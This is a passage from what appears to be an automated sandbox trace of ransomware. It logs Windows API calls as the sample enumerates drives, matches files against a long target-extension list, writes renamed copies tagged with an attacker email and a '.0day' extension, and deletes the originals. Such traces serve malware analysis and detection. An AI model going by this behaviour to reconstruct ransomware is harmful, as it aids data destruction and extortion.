(hFile=0x220) returned 1 [0057.903] CloseHandle (hObject=0x220) returned 1 [0057.904] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x370fec8 | out: lpNewFilePointer=0x0) returned 1 [0057.904] SetEndOfFile (hFile=0x208) returned 1 [0057.904] CloseHandle (hObject=0x208) returned 1 [0057.905] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEERR.DLL.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0057.905] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEERR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceerr.dll")) returned 1 [0057.905] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEERR.DLL") returned 66 [0057.905] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEERR.DLL") returned 66 [0057.905] lstrlenW (lpString=".doc") returned 4 [0057.905] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0057.905] lstrlenW (lpString=".docx") returned 5 [0057.905] lstrcmpiW (lpString1=".docx", lpString2="R.DLL") returned -1 [0057.905] lstrlenW (lpString=".pdf") returned 4 [0057.905] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0057.905] lstrlenW (lpString=".xls") returned 4 [0057.905] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0057.905] lstrlenW (lpString=".xlsx") returned 5 [0057.905] lstrcmpiW (lpString1=".xlsx", lpString2="R.DLL") returned -1 [0057.905] lstrlenW (lpString=".ppt") returned 4 [0057.905] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0057.905] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEERR.DLL") returned 66 [0057.905] lstrlenW (lpString=".zip") returned 4 [0057.905] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0057.905] lstrlenW (lpString=".rar") returned 4 [0057.906] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0057.906] lstrlenW (lpString=".bz2") returned 4 [0057.906] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0057.906] lstrlenW (lpString=".7z") returned 3 [0057.906] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0057.906] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEERR.DLL") returned 66 [0057.906] lstrlenW (lpString=".dbf") returned 4 [0057.906] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0057.906] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEERR.DLL") returned 66 [0057.906] lstrlenW (lpString=".1cd") returned 4 [0057.906] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0057.906] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEERR.DLL") returned 66 [0057.906] lstrlenW (lpString=".jpg") returned 4 [0057.906] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0057.906] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEERR.DLL") returned 66 [0057.906] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEERR.DLL") returned 66 [0057.906] lstrlenW (lpString=".doc") returned 4 [0057.906] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0057.906] lstrlenW (lpString=".docx") returned 5 [0057.906] lstrcmpiW (lpString1=".docx", lpString2="R.DLL") returned -1 [0057.906] lstrlenW (lpString=".pdf") returned 4 [0057.906] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0057.906] lstrlenW (lpString=".xls") returned 4 [0057.906] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0057.906] lstrlenW (lpString=".xlsx") returned 5 [0057.906] lstrcmpiW (lpString1=".xlsx", lpString2="R.DLL") returned -1 [0057.906] lstrlenW (lpString=".ppt") returned 4 [0057.906] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0057.906] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEERR.DLL") returned 66 [0057.906] lstrlenW (lpString=".zip") returned 4 [0057.906] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0057.907] lstrlenW (lpString=".rar") returned 4 [0057.907] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0057.907] lstrlenW (lpString=".bz2") returned 4 [0057.907] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0057.907] lstrlenW (lpString=".7z") returned 3 [0057.907] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0057.907] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEERR.DLL") returned 66 [0057.907] lstrlenW (lpString=".dbf") returned 4 [0057.907] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0057.907] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEERR.DLL") returned 66 [0057.907] lstrlenW (lpString=".1cd") returned 4 [0057.907] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0057.907] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEERR.DLL") returned 66 [0057.907] lstrlenW (lpString=".jpg") returned 4 [0057.907] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0057.907] lstrcmpiW (lpString1=".DLL", lpString2=".0day") returned 1 [0057.907] lstrlenW (lpString="ACEEXCH.DLL") returned 11 [0057.907] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCH.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceexch.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0057.908] GetFileSizeEx (in: hFile=0x208, lpFileSize=0x370ff1c | out: lpFileSize=0x370ff1c*=442272) returned 1 [0057.908] CloseHandle (hObject=0x208) returned 1 [0057.908] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCH.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceexch.dll")) returned 0x20 [0057.908] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCH.DLL.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceexch.dll.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0057.908] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCH.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceexch.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0057.908] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x370fec8 | out: lpNewFilePointer=0x0) returned 1 [0057.908] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x370fec8 | out: lpNewFilePointer=0x0) returned 1 [0057.908] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCH.DLL.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceexch.dll.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x220 [0057.908] GetLastError () returned 0x0 [0057.908] ReadFile (hFile=0x208, lpBuffer=0x3d90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x370fed4, lpOverlapped=0x0) Thread: id = 19 os_tid = 0xadc [0032.945] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xfffe) returned 0x37d0f98 [0032.945] lstrlenW (lpString="C:") returned 2 [0032.945] FindFirstFileW (in: lpFileName="C:\\*", lpFindFileData=0x3a5fd00 | out: lpFindFileData=0x3a5fd00*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1002f, dwReserved1=0x0, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 0x6e2968 [0032.946] lstrlenW (lpString="C:\\$Recycle.Bin") returned 15 [0032.946] lstrcmpiW (lpString1="C:\\Windows", lpString2="C:\\$Recycle.Bin") returned 1 [0032.946] lstrlenW (lpString="$Recycle.Bin") returned 12 [0032.946] lstrcmpiW (lpString1="C:\\Windows", lpString2="$Recycle.Bin") returned 1 [0032.946] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xfffe) returned 0x37e0fa0 [0032.946] lstrlenW (lpString="C:\\$Recycle.Bin") returned 15 [0032.946] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\*", lpFindFileData=0x3a5fa84 | out: lpFindFileData=0x3a5fa84*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6e29a8 [0032.946] FindNextFileW (in: hFindFile=0x6e29a8, lpFindFileData=0x3a5fa84 | out: lpFindFileData=0x3a5fa84*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0032.946] FindNextFileW (in: hFindFile=0x6e29a8, lpFindFileData=0x3a5fa84 | out: lpFindFileData=0x3a5fa84*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb63e4b00, ftLastAccessTime.dwHighDateTime=0x1d337f4, ftLastWriteTime.dwLowDateTime=0xb63e4b00, ftLastWriteTime.dwHighDateTime=0x1d337f4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="S-1-5-21-3388679973-3930757225-3770151564-1000", cAlternateFileName="S-1-5-~1")) returned 1 [0032.946] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000") returned 62 [0032.946] lstrcmpiW (lpString1="C:\\Windows", lpString2="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000") returned 1 [0032.946] lstrlenW (lpString="S-1-5-21-3388679973-3930757225-3770151564-1000") returned 46 [0032.947] lstrcmpiW (lpString1="C:\\Windows", lpString2="S-1-5-21-3388679973-3930757225-3770151564-1000") returned -1 [0032.947] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xfffe) returned 0x37f0fa8 [0032.947] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000") returned 62 [0032.947] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\*", lpFindFileData=0x3a5f808 | out: lpFindFileData=0x3a5f808*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb63e4b00, ftLastAccessTime.dwHighDateTime=0x1d337f4, ftLastWriteTime.dwLowDateTime=0xb63e4b00, ftLastWriteTime.dwHighDateTime=0x1d337f4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6e39f0 [0032.947] FindNextFileW (in: hFindFile=0x6e39f0, lpFindFileData=0x3a5f808 | out: lpFindFileData=0x3a5f808*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb63e4b00, ftLastAccessTime.dwHighDateTime=0x1d337f4, ftLastWriteTime.dwLowDateTime=0xb63e4b00, ftLastWriteTime.dwHighDateTime=0x1d337f4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0032.947] FindNextFileW (in: hFindFile=0x6e39f0, lpFindFileData=0x3a5f808 | out: lpFindFileData=0x3a5f808*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0032.947] lstrlenW (lpString="desktop.ini") returned 11 [0032.947] lstrlenW (lpString=".1cd") returned 4 [0032.947] lstrcmpiW (lpString1=".1cd", lpString2=".ini") returned -1 [0032.947] lstrlenW (lpString=".3ds") returned 4 [0032.947] lstrcmpiW (lpString1=".3ds", lpString2=".ini") returned -1 [0032.947] lstrlenW (lpString=".3fr") returned 4 [0032.947] lstrcmpiW (lpString1=".3fr", lpString2=".ini") returned -1 [0032.947] lstrlenW (lpString=".3g2") returned 4 [0032.948] lstrcmpiW (lpString1=".3g2", lpString2=".ini") returned -1 [0032.948] lstrlenW (lpString=".3gp") returned 4 [0032.948] lstrcmpiW (lpString1=".3gp", lpString2=".ini") returned -1 [0032.948] lstrlenW (lpString=".7z") returned 3 [0032.948] lstrcmpiW (lpString1=".7z", lpString2="ini") returned -1 [0032.948] lstrlenW (lpString=".accda") returned 6 [0032.948] lstrcmpiW (lpString1=".accda", lpString2="op.ini") returned -1 [0032.948] lstrlenW (lpString=".accdb") returned 6 [0032.948] lstrcmpiW (lpString1=".accdb", lpString2="op.ini") returned -1 [0032.948] lstrlenW (lpString=".accdc") returned 6 [0032.948] lstrcmpiW (lpString1=".accdc", lpString2="op.ini") returned -1 [0032.948] lstrlenW (lpString=".accde") returned 6 [0032.948] lstrcmpiW (lpString1=".accde", lpString2="op.ini") returned -1 [0032.948] lstrlenW (lpString=".accdt") returned 6 [0032.948] lstrcmpiW (lpString1=".accdt", lpString2="op.ini") returned -1 [0032.948] lstrlenW (lpString=".accdw") returned 6 [0032.948] lstrcmpiW (lpString1=".accdw", lpString2="op.ini") returned -1 [0032.948] lstrlenW (lpString=".adb") returned 4 [0032.948] lstrcmpiW (lpString1=".adb", lpString2=".ini") returned -1 [0032.948] lstrlenW (lpString=".adp") returned 4 [0032.948] lstrcmpiW (lpString1=".adp", lpString2=".ini") returned -1 [0032.948] lstrlenW (lpString=".ai") returned 3 [0032.948] lstrcmpiW (lpString1=".ai", lpString2="ini") returned -1 [0032.948] lstrlenW (lpString=".ai3") returned 4 [0032.948] lstrcmpiW (lpString1=".ai3", lpString2=".ini") returned -1 [0032.948] lstrlenW (lpString=".ai4") returned 4 [0032.948] lstrcmpiW (lpString1=".ai4", lpString2=".ini") returned -1 [0032.948] lstrlenW (lpString=".ai5") returned 4 [0032.948] lstrcmpiW (lpString1=".ai5", lpString2=".ini") returned -1 [0032.948] lstrlenW (lpString=".ai6") returned 4 [0032.948] lstrcmpiW (lpString1=".ai6", lpString2=".ini") returned -1 [0032.948] lstrlenW (lpString=".ai7") returned 4 [0032.948] lstrcmpiW (lpString1=".ai7", lpString2=".ini") returned -1 [0032.948] lstrlenW (lpString=".ai8") returned 4 [0032.949] lstrcmpiW (lpString1=".ai8", lpString2=".ini") returned -1 [0032.949] lstrlenW (lpString=".anim") returned 5 [0032.949] lstrcmpiW (lpString1=".anim", lpString2="p.ini") returned -1 [0032.949] lstrlenW (lpString=".arw") returned 4 [0032.949] lstrcmpiW (lpString1=".arw", lpString2=".ini") returned -1 [0032.949] lstrlenW (lpString=".as") returned 3 [0032.949] lstrcmpiW (lpString1=".as", lpString2="ini") returned -1 [0032.949] lstrlenW (lpString=".asa") returned 4 [0032.949] lstrcmpiW (lpString1=".asa", lpString2=".ini") returned -1 [0032.949] lstrlenW (lpString=".asc") returned 4 [0032.949] lstrcmpiW (lpString1=".asc", lpString2=".ini") returned -1 [0032.949] lstrlenW (lpString=".ascx") returned 5 [0032.949] lstrcmpiW (lpString1=".ascx", lpString2="p.ini") returned -1 [0032.949] lstrlenW (lpString=".asm") returned 4 [0032.949] lstrcmpiW (lpString1=".asm", lpString2=".ini") returned -1 [0032.949] lstrlenW (lpString=".asmx") returned 5 [0032.949] lstrcmpiW (lpString1=".asmx", lpString2="p.ini") returned -1 [0032.949] lstrlenW (lpString=".asp") returned 4 [0032.949] lstrcmpiW (lpString1=".asp", lpString2=".ini") returned -1 [0032.949] lstrlenW (lpString=".aspx") returned 5 [0032.949] lstrcmpiW (lpString1=".aspx", lpString2="p.ini") returned -1 [0032.949] lstrlenW (lpString=".asr") returned 4 [0032.949] lstrcmpiW (lpString1=".asr", lpString2=".ini") returned -1 [0032.949] lstrlenW (lpString=".asx") returned 4 [0032.949] lstrcmpiW (lpString1=".asx", lpString2=".ini") returned -1 [0032.949] lstrlenW (lpString=".avi") returned 4 [0032.949] lstrcmpiW (lpString1=".avi", lpString2=".ini") returned -1 [0032.949] lstrlenW (lpString=".avs") returned 4 [0032.949] lstrcmpiW (lpString1=".avs", lpString2=".ini") returned -1 [0032.949] lstrlenW (lpString=".backup") returned 7 [0032.949] lstrcmpiW (lpString1=".backup", lpString2="top.ini") returned -1 [0032.949] lstrlenW (lpString=".bak") returned 4 [0032.949] lstrcmpiW (lpString1=".bak", lpString2=".ini") returned -1 [0032.949] lstrlenW (lpString=".bay") returned 4 [0032.950] lstrcmpiW (lpString1=".bay", lpString2=".ini") returned -1 [0032.950] lstrlenW (lpString=".bd") returned 3 [0032.950] lstrcmpiW (lpString1=".bd", lpString2="ini") returned -1 [0032.950] lstrlenW (lpString=".bin") returned 4 [0032.950] lstrcmpiW (lpString1=".bin", lpString2=".ini") returned -1 [0032.950] lstrlenW (lpString=".bmp") returned 4 [0032.950] lstrcmpiW (lpString1=".bmp", lpString2=".ini") returned -1 [0032.950] lstrlenW (lpString=".bz2") returned 4 [0032.950] lstrcmpiW (lpString1=".bz2", lpString2=".ini") returned -1 [0032.950] lstrlenW (lpString=".c") returned 2 [0032.950] lstrcmpiW (lpString1=".c", lpString2="ni") returned -1 [0032.950] lstrlenW (lpString=".cdr") returned 4 [0032.950] lstrcmpiW (lpString1=".cdr", lpString2=".ini") returned -1 [0032.950] lstrlenW (lpString=".cer") returned 4 [0032.950] lstrcmpiW (lpString1=".cer", lpString2=".ini") returned -1 [0032.950] lstrlenW (lpString=".cf") returned 3 [0032.950] lstrcmpiW (lpString1=".cf", lpString2="ini") returned -1 [0032.950] lstrlenW (lpString=".cfc") returned 4 [0032.950] lstrcmpiW (lpString1=".cfc", lpString2=".ini") returned -1 [0032.950] lstrlenW (lpString=".cfm") returned 4 [0032.950] lstrcmpiW (lpString1=".cfm", lpString2=".ini") returned -1 [0032.950] lstrlenW (lpString=".cfml") returned 5 [0032.950] lstrcmpiW (lpString1=".cfml", lpString2="p.ini") returned -1 [0032.950] lstrlenW (lpString=".cfu") returned 4 [0032.950] lstrcmpiW (lpString1=".cfu", lpString2=".ini") returned -1 [0032.950] lstrlenW (lpString=".chm") returned 4 [0032.950] lstrcmpiW (lpString1=".chm", lpString2=".ini") returned -1 [0032.950] lstrlenW (lpString=".cin") returned 4 [0032.950] lstrcmpiW (lpString1=".cin", lpString2=".ini") returned -1 [0032.950] lstrlenW (lpString=".class") returned 6 [0032.950] lstrcmpiW (lpString1=".class", lpString2="op.ini") returned -1 [0032.950] lstrlenW (lpString=".clx") returned 4 [0032.950] lstrcmpiW (lpString1=".clx", lpString2=".ini") returned -1 [0032.950] lstrlenW (lpString=".config") returned 7 [0032.950] lstrcmpiW (lpString1=".config", lpString2="top.ini") returned -1 [0032.951] lstrlenW (lpString=".cpp") returned 4 [0032.951] lstrcmpiW (lpString1=".cpp", lpString2=".ini") returned -1 [0032.951] lstrlenW (lpString=".cr2") returned 4 [0032.951] lstrcmpiW (lpString1=".cr2", lpString2=".ini") returned -1 [0032.951] lstrlenW (lpString=".crt") returned 4 [0032.951] lstrcmpiW (lpString1=".crt", lpString2=".ini") returned -1 [0032.951] lstrlenW (lpString=".crw") returned 4 [0032.951] lstrcmpiW (lpString1=".crw", lpString2=".ini") returned -1 [0032.951] lstrlenW (lpString=".cs") returned 3 [0032.951] lstrcmpiW (lpString1=".cs", lpString2="ini") returned -1 [0032.951] lstrlenW (lpString=".css") returned 4 [0032.951] lstrcmpiW (lpString1=".css", lpString2=".ini") returned -1 [0032.951] lstrlenW (lpString=".csv") returned 4 [0032.951] lstrcmpiW (lpString1=".csv", lpString2=".ini") returned -1 [0032.951] lstrlenW (lpString=".cub") returned 4 [0032.951] lstrcmpiW (lpString1=".cub", lpString2=".ini") returned -1 [0032.951] lstrlenW (lpString=".dae") returned 4 [0032.951] lstrcmpiW (lpString1=".dae", lpString2=".ini") returned -1 [0032.951] lstrlenW (lpString=".dat") returned 4 [0032.951] lstrcmpiW (lpString1=".dat", lpString2=".ini") returned -1 [0032.951] lstrlenW (lpString=".db") returned 3 [0032.951] lstrcmpiW (lpString1=".db", lpString2="ini") returned -1 [0032.951] lstrlenW (lpString=".dbf") returned 4 [0032.951] lstrcmpiW (lpString1=".dbf", lpString2=".ini") returned -1 [0032.951] lstrlenW (lpString=".dbx") returned 4 [0032.951] lstrcmpiW (lpString1=".dbx", lpString2=".ini") returned -1 [0032.951] lstrlenW (lpString=".dc3") returned 4 [0032.951] lstrcmpiW (lpString1=".dc3", lpString2=".ini") returned -1 [0032.951] lstrlenW (lpString=".dcm") returned 4 [0032.951] lstrcmpiW (lpString1=".dcm", lpString2=".ini") returned -1 [0032.951] lstrlenW (lpString=".dcr") returned 4 [0032.951] lstrcmpiW (lpString1=".dcr", lpString2=".ini") returned -1 [0032.951] lstrlenW (lpString=".der") returned 4 [0032.951] lstrcmpiW (lpString1=".der", lpString2=".ini") returned -1 [0032.951] lstrlenW (lpString=".dib") returned 4 [0032.952] lstrcmpiW (lpString1=".dib", lpString2=".ini") returned -1 [0032.952] lstrlenW (lpString=".dic") returned 4 [0032.952] lstrcmpiW (lpString1=".dic", lpString2=".ini") returned -1 [0032.952] lstrlenW (lpString=".dif") returned 4 [0032.952] lstrcmpiW (lpString1=".dif", lpString2=".ini") returned -1 [0032.952] lstrlenW (lpString=".divx") returned 5 [0032.952] lstrcmpiW (lpString1=".divx", lpString2="p.ini") returned -1 [0032.952] lstrlenW (lpString=".djvu") returned 5 [0032.952] lstrcmpiW (lpString1=".djvu", lpString2="p.ini") returned -1 [0032.952] lstrlenW (lpString=".dng") returned 4 [0032.952] lstrcmpiW (lpString1=".dng", lpString2=".ini") returned -1 [0032.952] lstrlenW (lpString=".doc") returned 4 [0032.952] lstrcmpiW (lpString1=".doc", lpString2=".ini") returned -1 [0032.952] lstrlenW (lpString=".docm") returned 5 [0032.952] lstrcmpiW (lpString1=".docm", lpString2="p.ini") returned -1 [0032.952] lstrlenW (lpString=".docx") returned 5 [0032.952] lstrcmpiW (lpString1=".docx", lpString2="p.ini") returned -1 [0032.952] lstrlenW (lpString=".dot") returned 4 [0032.952] lstrcmpiW (lpString1=".dot", lpString2=".ini") returned -1 [0032.952] lstrlenW (lpString=".dotm") returned 5 [0032.952] lstrcmpiW (lpString1=".dotm", lpString2="p.ini") returned -1 [0032.952] lstrlenW (lpString=".dotx") returned 5 [0032.952] lstrcmpiW (lpString1=".dotx", lpString2="p.ini") returned -1 [0032.952] lstrlenW (lpString=".dpx") returned 4 [0032.952] lstrcmpiW (lpString1=".dpx", lpString2=".ini") returned -1 [0032.952] lstrlenW (lpString=".dqy") returned 4 [0032.952] lstrcmpiW (lpString1=".dqy", lpString2=".ini") returned -1 [0032.952] lstrlenW (lpString=".dsn") returned 4 [0032.952] lstrcmpiW (lpString1=".dsn", lpString2=".ini") returned -1 [0032.952] lstrlenW (lpString=".dt") returned 3 [0032.952] lstrcmpiW (lpString1=".dt", lpString2="ini") returned -1 [0032.952] lstrlenW (lpString=".dtd") returned 4 [0032.952] lstrcmpiW (lpString1=".dtd", lpString2=".ini") returned -1 [0032.952] lstrlenW (lpString=".dwg") returned 4 [0032.952] lstrcmpiW (lpString1=".dwg", lpString2=".ini") returned -1 [0032.953] lstrlenW (lpString=".dwt") returned 4 [0032.953] lstrcmpiW (lpString1=".dwt", lpString2=".ini") returned -1 [0032.953] lstrlenW (lpString=".dx") returned 3 [0032.953] lstrcmpiW (lpString1=".dx", lpString2="ini") returned -1 [0032.953] lstrlenW (lpString=".dxf") returned 4 [0032.953] lstrcmpiW (lpString1=".dxf", lpString2=".ini") returned -1 [0032.953] lstrlenW (lpString=".edml") returned 5 [0032.953] lstrcmpiW (lpString1=".edml", lpString2="p.ini") returned -1 [0032.953] lstrlenW (lpString=".efd") returned 4 [0032.953] lstrcmpiW (lpString1=".efd", lpString2=".ini") returned -1 [0032.953] lstrlenW (lpString=".elf") returned 4 [0032.953] lstrcmpiW (lpString1=".elf", lpString2=".ini") returned -1 [0032.953] lstrlenW (lpString=".emf") returned 4 [0032.953] lstrcmpiW (lpString1=".emf", lpString2=".ini") returned -1 [0032.953] lstrlenW (lpString=".emz") returned 4 [0032.953] lstrcmpiW (lpString1=".emz", lpString2=".ini") returned -1 [0032.953] lstrlenW (lpString=".epf") returned 4 [0032.953] lstrcmpiW (lpString1=".epf", lpString2=".ini") returned -1 [0032.953] lstrlenW (lpString=".eps") returned 4 [0032.953] lstrcmpiW (lpString1=".eps", lpString2=".ini") returned -1 [0032.953] lstrlenW (lpString=".epsf") returned 5 [0032.953] lstrcmpiW (lpString1=".epsf", lpString2="p.ini") returned -1 [0032.953] lstrlenW (lpString=".epsp") returned 5 [0032.953] lstrcmpiW (lpString1=".epsp", lpString2="p.ini") returned -1 [0032.953] lstrlenW (lpString=".erf") returned 4 [0032.953] lstrcmpiW (lpString1=".erf", lpString2=".ini") returned -1 [0032.953] lstrlenW (lpString=".exr") returned 4 [0032.953] lstrcmpiW (lpString1=".exr", lpString2=".ini") returned -1 [0032.953] lstrlenW (lpString=".f4v") returned 4 [0032.953] lstrcmpiW (lpString1=".f4v", lpString2=".ini") returned -1 [0032.953] lstrlenW (lpString=".fido") returned 5 [0032.953] lstrcmpiW (lpString1=".fido", lpString2="p.ini") returned -1 [0032.953] lstrlenW (lpString=".flm") returned 4 [0032.953] lstrcmpiW (lpString1=".flm", lpString2=".ini") returned -1 [0032.953] lstrlenW (lpString=".flv") returned 4 [0032.954] lstrcmpiW (lpString1=".flv", lpString2=".ini") returned -1 [0032.954] lstrlenW (lpString=".frm") returned 4 [0032.954] lstrcmpiW (lpString1=".frm", lpString2=".ini") returned -1 [0032.954] lstrlenW (lpString=".fxg") returned 4 [0032.954] lstrcmpiW (lpString1=".fxg", lpString2=".ini") returned -1 [0032.954] lstrlenW (lpString=".geo") returned 4 [0032.954] lstrcmpiW (lpString1=".geo", lpString2=".ini") returned -1 [0032.954] lstrlenW (lpString=".gif") returned 4 [0032.954] lstrcmpiW (lpString1=".gif", lpString2=".ini") returned -1 [0032.954] lstrlenW (lpString=".grs") returned 4 [0032.954] lstrcmpiW (lpString1=".grs", lpString2=".ini") returned -1 [0032.954] lstrlenW (lpString=".gz") returned 3 [0032.954] lstrcmpiW (lpString1=".gz", lpString2="ini") returned -1 [0032.954] lstrlenW (lpString=".h") returned 2 [0032.954] lstrcmpiW (lpString1=".h", lpString2="ni") returned -1 [0032.954] lstrlenW (lpString=".hdr") returned 4 [0032.954] lstrcmpiW (lpString1=".hdr", lpString2=".ini") returned -1 [0032.954] lstrlenW (lpString=".hpp") returned 4 [0032.954] lstrcmpiW (lpString1=".hpp", lpString2=".ini") returned -1 [0032.954] lstrlenW (lpString=".hta") returned 4 [0032.954] lstrcmpiW (lpString1=".hta", 